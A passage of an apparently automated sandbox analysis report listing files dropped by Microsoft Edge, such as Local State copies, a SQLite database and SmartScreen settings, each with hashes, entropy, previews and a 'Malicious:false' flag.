                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):58444
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.101662738007985
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7yneCBS2qX7b9tPHgorQXdbiR3oM:z/0+zI7ynekS20NtP0Xdbe3
                                                                                                                                                                                                                                                                                          MD5:BED066534D0302F7A3605DC9CC5EF0B4
                                                                                                                                                                                                                                                                                          SHA1:C5109EF3901241AA125645F047000D641485BC1C
                                                                                                                                                                                                                                                                                          SHA-256:908EFAC94F9EE126C54D884934ED738B3EA913E4536636E5371EB7BB48B368A8
                                                                                                                                                                                                                                                                                          SHA-512:DFBBDDA7A2C1881268C5BBAC878069F1B3348658CD6D80A789B7D7555CBA92C9B7DB8D0183C97DE8B99983F3C681C32FF49891209D6670EEAB4003EACF5E5E9A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF287c4.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):58444
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.101662738007985
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7yneCBS2qX7b9tPHgorQXdbiR3oM:z/0+zI7ynekS20NtP0Xdbe3
                                                                                                                                                                                                                                                                                          MD5:BED066534D0302F7A3605DC9CC5EF0B4
                                                                                                                                                                                                                                                                                          SHA1:C5109EF3901241AA125645F047000D641485BC1C
                                                                                                                                                                                                                                                                                          SHA-256:908EFAC94F9EE126C54D884934ED738B3EA913E4536636E5371EB7BB48B368A8
                                                                                                                                                                                                                                                                                          SHA-512:DFBBDDA7A2C1881268C5BBAC878069F1B3348658CD6D80A789B7D7555CBA92C9B7DB8D0183C97DE8B99983F3C681C32FF49891209D6670EEAB4003EACF5E5E9A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF287e3.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):58444
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.101662738007985
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7yneCBS2qX7b9tPHgorQXdbiR3oM:z/0+zI7ynekS20NtP0Xdbe3
                                                                                                                                                                                                                                                                                          MD5:BED066534D0302F7A3605DC9CC5EF0B4
                                                                                                                                                                                                                                                                                          SHA1:C5109EF3901241AA125645F047000D641485BC1C
                                                                                                                                                                                                                                                                                          SHA-256:908EFAC94F9EE126C54D884934ED738B3EA913E4536636E5371EB7BB48B368A8
                                                                                                                                                                                                                                                                                          SHA-512:DFBBDDA7A2C1881268C5BBAC878069F1B3348658CD6D80A789B7D7555CBA92C9B7DB8D0183C97DE8B99983F3C681C32FF49891209D6670EEAB4003EACF5E5E9A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF28a15.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):58444
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.101662738007985
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7yneCBS2qX7b9tPHgorQXdbiR3oM:z/0+zI7ynekS20NtP0Xdbe3
                                                                                                                                                                                                                                                                                          MD5:BED066534D0302F7A3605DC9CC5EF0B4
                                                                                                                                                                                                                                                                                          SHA1:C5109EF3901241AA125645F047000D641485BC1C
                                                                                                                                                                                                                                                                                          SHA-256:908EFAC94F9EE126C54D884934ED738B3EA913E4536636E5371EB7BB48B368A8
                                                                                                                                                                                                                                                                                          SHA-512:DFBBDDA7A2C1881268C5BBAC878069F1B3348658CD6D80A789B7D7555CBA92C9B7DB8D0183C97DE8B99983F3C681C32FF49891209D6670EEAB4003EACF5E5E9A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2b04b.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):58444
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.101662738007985
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7yneCBS2qX7b9tPHgorQXdbiR3oM:z/0+zI7ynekS20NtP0Xdbe3
                                                                                                                                                                                                                                                                                          MD5:BED066534D0302F7A3605DC9CC5EF0B4
                                                                                                                                                                                                                                                                                          SHA1:C5109EF3901241AA125645F047000D641485BC1C
                                                                                                                                                                                                                                                                                          SHA-256:908EFAC94F9EE126C54D884934ED738B3EA913E4536636E5371EB7BB48B368A8
                                                                                                                                                                                                                                                                                          SHA-512:DFBBDDA7A2C1881268C5BBAC878069F1B3348658CD6D80A789B7D7555CBA92C9B7DB8D0183C97DE8B99983F3C681C32FF49891209D6670EEAB4003EACF5E5E9A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF39a5d.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):58444
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.101662738007985
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7yneCBS2qX7b9tPHgorQXdbiR3oM:z/0+zI7ynekS20NtP0Xdbe3
                                                                                                                                                                                                                                                                                          MD5:BED066534D0302F7A3605DC9CC5EF0B4
                                                                                                                                                                                                                                                                                          SHA1:C5109EF3901241AA125645F047000D641485BC1C
                                                                                                                                                                                                                                                                                          SHA-256:908EFAC94F9EE126C54D884934ED738B3EA913E4536636E5371EB7BB48B368A8
                                                                                                                                                                                                                                                                                          SHA-512:DFBBDDA7A2C1881268C5BBAC878069F1B3348658CD6D80A789B7D7555CBA92C9B7DB8D0183C97DE8B99983F3C681C32FF49891209D6670EEAB4003EACF5E5E9A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3f6a6.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):58444
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.101662738007985
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7yneCBS2qX7b9tPHgorQXdbiR3oM:z/0+zI7ynekS20NtP0Xdbe3
                                                                                                                                                                                                                                                                                          MD5:BED066534D0302F7A3605DC9CC5EF0B4
                                                                                                                                                                                                                                                                                          SHA1:C5109EF3901241AA125645F047000D641485BC1C
                                                                                                                                                                                                                                                                                          SHA-256:908EFAC94F9EE126C54D884934ED738B3EA913E4536636E5371EB7BB48B368A8
                                                                                                                                                                                                                                                                                          SHA-512:DFBBDDA7A2C1881268C5BBAC878069F1B3348658CD6D80A789B7D7555CBA92C9B7DB8D0183C97DE8B99983F3C681C32FF49891209D6670EEAB4003EACF5E5E9A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                          MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                          SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                          SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                          SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):47
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                          MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                          SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                          SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                          SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                          MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                          SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                          SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                          SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):81
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                          MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                          SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                          SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                          SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):130439
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                          MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                          SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                          SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                          SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.346439344671015
